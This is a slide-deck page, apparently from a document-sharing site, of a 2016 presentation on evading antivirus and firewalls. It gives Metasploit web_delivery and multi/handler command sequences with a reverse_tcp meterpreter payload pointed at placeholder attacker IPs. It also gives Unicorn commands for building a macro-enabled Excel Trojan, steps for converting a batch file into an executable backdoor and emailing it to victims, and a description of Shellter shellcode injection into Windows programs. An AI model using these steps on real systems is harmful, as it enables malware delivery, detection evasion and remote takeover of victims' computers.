Antivirus Bypass Techniques - 2016
•Download as DOCX, PDF•
2 likes•948 views
This document discusses techniques for evading antivirus and firewalls, including generating executable files with embedded PowerShell commands to execute backdoors, generating macro-enabled Excel files with encoded payloads to act as Trojans, and using the Shellter tool to dynamically inject shellcode into Windows applications. Figures are provided showing the use of tools like Metasploit and Unicorn to generate payloads and backdoors, embedding them in files, bypassing antivirus detection, and attackers gaining sessions on victim machines.
Report
Share
Antivirus Bypass Techniques - 2016
- 1. Raghav Bisht Latest Techniquesfor Evading Antivirusand Firewalls. AntiVirus Evasion
- 2. 2 | P a g e A. Power Shell Exploitation 1. Technique : Generating Executables (.exe & .bat) Files Description: Attacker create a windows executable (.exe) program which acts as a Trojan. In this technique attacker generate a power shell command whose work is to create a webclient & embed the backdoor inside his executable program. How : Attacker use Metasploit framework to generate power shell command. use exploit/multi/script/web_delivery show targets set target 2 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <IP> set SRVHOST <Server IP> set URIPATH / exploit After creating the link attackers only task is to run the command on victim computer so, for doing that attacker will create a batch file Eg. Notepad.bat In Notepad.bat attacker write his code& embed the Evil Power Shell Command. Convert the .bat file to .exe & send to victim Result : Figure 1. Generating PowerShell Command
- 3. 3 | P a g e Figure 2. Embedding & Conversion of backdoor to .exe Figure 3. Virus Total Result For Both Files
- 4. 4 | P a g e Figure 4. Victim Executing The Program Figure 5. Attacker Getting Sessions
- 5. 5 | P a g e B. Macros 1. Technique : Generating Macros Enable (.xlsm) Files Description: Attacker creates a encoded payload using tool name Unicorn and use that payload to generate a macro enable Microsoft excel file which acts as a Trojan. How : Download & install Unicorn git clone https://github.com/trustedsec/unicorn.git cd unicorn python unicorn.py windows/meterpreter/reverse_tcp <Attacker IP> <Port For Listening> macro Attacker use Metasploit framework & start handler Exploit. use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <IP> set PORT <PORT> exploit Now use the generated payload and create micro enable excel file Result : Figure 6. Generate Payload with unicorn
- 6. 6 | P a g e Figure 7. Attacker Machine Start Handler Figure 8. Create a micro enable excel file with evil code
- 7. 7 | P a g e Figure 9. Virus Total Result Figure 10. Attaching Trojan With Email
- 8. 8 | P a g e Figure 11. Send Trojan With Email On Different Email Vendors Figure 12. Victim AV Bypass
- 9. 9 | P a g e Figure 13. Victim Opens The File Figure 14. Attacker Sessions
- 10. 10 | P a g e C. Shellter Project 1. Technique : Shellcode injection tool Description: Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created. It can be used in order to inject shellcode into native Windows applications (currently 32-bit applications only). The shellcode can be something yours or something generated through a framework, such as Metasploit. Result : Figure 15
- 11. 11 | P a g e Figure 16
- 12. 12 | P a g e Figure 17
- 13. 13 | P a g e Figure 18